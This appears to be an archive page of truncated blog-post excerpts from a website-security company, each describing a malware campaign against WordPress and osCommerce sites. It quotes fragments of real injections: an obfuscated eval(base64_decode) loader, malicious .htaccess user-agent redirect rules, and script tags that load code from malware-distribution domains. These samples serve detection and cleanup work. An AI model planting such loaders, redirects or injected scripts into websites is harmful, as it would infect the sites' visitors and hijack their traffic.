This post was put together in collaboration with one of our Support Engineers, Bruno Borges. Be sure to take a minute and say thanks for the info; he loves Twitter (when it's up). It seems every day we're combating malicious redirections. Often they are simple, but every day they are evolving, and in some instances become [...]
Website Malware Removal – Counter.php
There are many variations of the Counter.php malware floating around the interwebs. This is a malicious redirect that sends your readers to a known bad site; that site houses a payload that responds based on the incoming user-agent. Malicious Site: natbushing.com Payload: counter.php Check out Sucuri Labs for more variations of Counter.php. If you use [...]
Website Malware Removal – Blackhole Exploit
Here is a quick little write-up on how to deal with one of the many variations of the Blackhole Exploit. The Infection If you scan your site using Sucuri SiteCheck and find yourself with a result that looks like this: Then you are dealing with an infection that is facilitated through the use of [...]
Understanding Conditional Malware – IP Centric Variation
In today's web malware landscape you can't help but take a minute to familiarize yourself with a concept known as conditional malware. As implied by the name, it is malware that only works when specific rules are met. Those rules can range from specific IP ranges to time of day. They are very tricky and as [...]
New Malware – Eval + GetMama + Encoded Javascript
We are seeing many WordPress sites on shared hosts getting compromised with an encoded JavaScript malware. It has multiple levels of obfuscation, and this is how it starts: 1 - ALL PHP files with an eval(base64_decode( line of code: /*god_mode_on*/eval (base64_decode("ZXZhbC hiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0 phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBvVmpGc2 JsTXdUa2RpVjFKWVRsZHdhMUl5ZURKWmJYYzFZa.. 2 - That long piece of code, once executed, gets decoded to: if (!function_exists(GetMama)){function opanki ($buf){$god_mode = $_SERVER["good"]; [...]
Ugly htaccess
No need to comment:

##!!##!!##!!##!!##!!####!!##!!##!!##!!##!!##
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]
RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} audi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} aste [NC,OR]
RewriteCond %{HTTP_USER_AGENT} avan [NC,OR]
RewriteCond %{HTTP_USER_AGENT} benq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} bird [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blac [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} brew [NC,OR]
[...]
New Malware – sweepstakesandcontestsnow.com
We are seeing many WordPress sites on shared hosts (GoDaddy, Bluehost, Dreamhost and a few others) compromised with a malware from sweepstakesandcontestsnow.com. This is what gets added to the hacked site: <script src="http://sweepstakesandcontestsnow.com/nl.php?nnn=1">.. And that code is used to infect the browser of the person visiting the compromised web site. What is interesting [...]
Malware updates: Aug 2011 – .htaccess to .ru and osa.pl, iframes to .cc and .il
We are often asked what the top domains distributing malware were, or which threats we see most often on our security scanner. For the month of August, things were very similar to the previous months, with a slight increase in the number of WordPress sites compromised due to the Timthumb.php vulnerability. If your site [...]
Malware update – Timthumb.php and .htaccess redirection
We have been very busy on our blog explaining the latest TimThumb.php vulnerability and the effect it is having on WordPress web sites. If you missed the articles, please check here: TimThumb.php – Just the tip of the iceberg Attacks Against Timthumb.php in the Wild – List of Themes and Plugins Being Scanned [...]
osCommerce compromises – Now from tiasissi.com.br
We have been blogging about the "willysy" malware for a little while, but the attacks against osCommerce are still happening and very active. The latest change is that the "willysy.com" (or exero.eu) type of injection has switched to http://tiasissi.com.br/revendedores/jquery/. This is what shows up on the hacked sites: <script src= http://tiasissi.com.br/revendedores/jquery/> Sucuri identifies those types of web-based [...]